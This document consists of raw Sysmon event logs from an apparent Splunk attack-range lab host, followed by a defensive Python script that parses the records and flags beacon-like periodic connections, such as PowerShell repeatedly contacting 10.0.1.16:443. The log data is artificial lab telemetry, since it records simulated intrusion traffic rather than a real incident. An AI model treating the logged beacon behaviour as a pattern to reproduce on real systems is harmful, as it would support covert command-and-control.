Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C64D381CC82667442E6DCFF29B65D2F,SHA256=2AD02A37A303AF814FA266D3FBBD347207BAD9F5618AC9F02C9214A73C414AB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:42.312{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921DC789C2B55032CCF7187B1A657A4A,SHA256=AC9F41F9EB395B9DF9D34EBAA69905D9CB889F8E8B1BC62CA74E11BA602C08EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.714{B81B27B7-4ED7-613A-4E90-03000000C801}29001772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:43.561{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.561{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.546{B81B27B7-4ED7-613A-4E90-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.345{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C18380DAAE895AC4E73C8414D8616FB,SHA256=D431431B73D914FE8660A76F06F5F29205EE38E0130DAE1D84E6E40780966B2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:44.959{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:44.959{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.959{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.944{B81B27B7-4ED8-613A-5090-03000000C801}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=316714ECACB1A7061660DDE173E5453B,SHA256=44826985AF8333EBF954FAA43920994E0F557DB25515E8ED4CF2A3FA876C70DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E95CF0CB5A1DEBFE5687772FBC415104,SHA256=D1F5782D1F9A4C2349B01BA58521847FD9E9443C84546D50DB0312D46A774479,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
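The records above are Sysmon events exported from Splunk with their XML field boundaries stripped, so every event reads as one run-on string. Because the Sysmon schema fixes the field order, the boundaries can be recovered: the header is EventID, Version, Level, Task, Opcode, Keywords, RecordID, Channel, Computer, RuleName, UtcTime (with Task always equal to EventID, which doubles as a self-check), and an Event ID 3 body follows the NetworkConnect field order. The following added example, which is not part of the page's export nor Splunk or Sysmon code, parses a constructed sample copied from this page's lines and then scores each (image, user, destination) tuple for beacon-like regularity of its connection intervals. It assumes RuleName is "-" and Level is 4 for every record (true here), and the minimum-hit and jitter thresholds are illustrative; the service-account list used to separate the Splunk stream forwarder's own heartbeat from an interactive user's process is likewise an assumption for this example.

```python
"""Parse Sysmon records exported from Splunk with their XML tags stripped, then
score outbound connections (Event ID 3) for beacon-like periodicity.
Added example; field order follows the Sysmon schema, RuleName is assumed to be "-"."""
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: records copied verbatim from this page's export, one per line.
SAMPLE = r"""
354300x800000000000000035084903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.407{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56670-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035084902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.176{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56669-false10.0.1.12-8000-
354300x800000000000000035084929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:56.419{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56671-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035084932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:58.117{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56672-false10.0.1.12-8000-
354300x800000000000000035084938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:01.431{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56673-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035084941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:04.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56674-false10.0.1.12-8000-
354300x800000000000000035084945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:05.455{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56675-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
354300x800000000000000035084978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:10.098{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56676-false10.0.1.12-8000-
354300x800000000000000035084982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:11.465{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56677-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
23542300x800000000000000035084928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:32.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED17D758099B5EE251AE02B0DD144854,SHA256=A2E7645D3DD27B369D7E55D3B2BA37D6E9741F665C6DB405F1DC1318D1A73784,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
10341000x800000000000000035084964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED8-613A-4F90-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
"""

# Header: EventID Version Level(4) Task(==EventID) Opcode(0) Keywords(16 hex digits)
# RecordID Channel Computer RuleName("-") UtcTime, then the event-specific body.
HEADER = re.compile(
    r"^(?P<eid>\d+)(?P<ver>\d)4(?P=eid)0(?P<kw>0x[0-9a-f]{16})(?P<rec>\d+)"
    r"Microsoft-Windows-Sysmon/Operational(?P<host>.+?)-"
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})(?P<rest>.*)$"
)

# Event ID 3 body: ProcessGuid ProcessId Image User Protocol Initiated SourceIsIpv6
# SourceIp SourceHostname SourcePort SourcePortName DestinationIsIpv6 DestinationIp
# DestinationHostname DestinationPort DestinationPortName. Port names never start with
# a digit, which is what lets "local56670-false" and "internal443https" split correctly.
NETCONN = re.compile(
    r"^\{(?P<guid>[0-9A-F-]{36})\}(?P<pid>\d+)(?P<image>[A-Za-z]:\\.*?\.exe)(?P<user>.*?)"
    r"(?P<proto>tcp|udp)(?P<initiated>true|false)(?P<src6>true|false)"
    r"(?P<src_ip>\d+\.\d+\.\d+\.\d+)(?P<src_host>.*?)(?P<src_port>\d+)(?P<src_name>[^\d\s]*?)"
    r"(?P<dst6>true|false)(?P<dst_ip>\d+\.\d+\.\d+\.\d+)(?P<dst_host>.*?)(?P<dst_port>\d+)"
    r"(?P<dst_name>[^\d\s]*)$"
)

# Assumed baseline: periodic traffic from these accounts is agent heartbeat until proven otherwise.
SERVICE_ACCOUNTS = ("NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\NETWORK SERVICE")


def parse_records(text):
    """One header dict per line; lines failing the Task == EventID self-check are dropped."""
    return [m.groupdict() for m in (HEADER.match(l.strip()) for l in text.splitlines()) if m]


def event_counts(records):
    """Event ID histogram, the first sanity check on an unfamiliar export."""
    return Counter(r["eid"] for r in records)


def network_connections(records):
    """Fully split Event ID 3 records with UtcTime parsed; unknown layouts are skipped, not guessed."""
    conns = []
    for r in records:
        m = NETCONN.match(r["rest"]) if r["eid"] == "3" else None
        if m is None:
            continue
        c = m.groupdict()
        c["ts"] = datetime.strptime(r["ts"], "%Y-%m-%d %H:%M:%S.%f")
        conns.append(c)
    return conns


def beacon_candidates(conns, min_hits=4, max_jitter=0.25):
    """Group by (image, user, destination) and flag regular inter-connection gaps.
    jitter is the coefficient of variation of the gaps (population stddev / mean)."""
    groups = defaultdict(list)
    for c in conns:
        groups[(c["image"], c["user"], c["dst_ip"], c["dst_port"])].append(c["ts"])
    findings = []
    for (image, user, ip, port), times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg > 0 else float("inf")
        periodic = jitter <= max_jitter
        findings.append({
            "image": image, "user": user, "dst": f"{ip}:{port}", "hits": len(times),
            "mean_gap_s": round(avg, 2), "jitter": round(jitter, 2), "periodic": periodic,
            # The forwarder's heartbeat under SYSTEM is as regular as a beacon, so periodicity
            # alone is not the verdict: only the interactive-account case is escalated.
            "needs_review": periodic and user not in SERVICE_ACCOUNTS,
        })
    return findings


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(dict(event_counts(recs)))
    for finding in beacon_candidates(network_connections(recs)):
        print(finding)
```

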